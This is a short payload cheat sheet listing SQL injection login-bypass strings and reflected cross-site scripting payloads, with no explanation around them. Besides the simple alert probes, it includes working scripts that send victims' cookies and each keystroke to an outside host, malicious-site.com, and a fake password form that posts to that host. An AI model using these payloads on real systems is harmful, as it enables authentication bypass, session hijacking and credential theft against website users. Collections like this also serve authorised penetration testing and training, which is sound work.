SQL Injection

'+OR+1=1--
administrator'--


Reflected XSS

<script>alert('XSS')</script>

<img src="x" onerror="alert('XSS')">

<a href="javascript:alert('XSS')">Click Here</a>


<script>document.location='http://malicious-site.com/steal.php?c='+document.cookie;</script>

<script>document.onkeypress=function(e){fetch('http://malicious-site.com/log.php?k='+e.key);}</script>

<form action="http://malicious-site.com/log.php" method="post"><input type="password" name="password"><input type="submit" value="Submit"></form>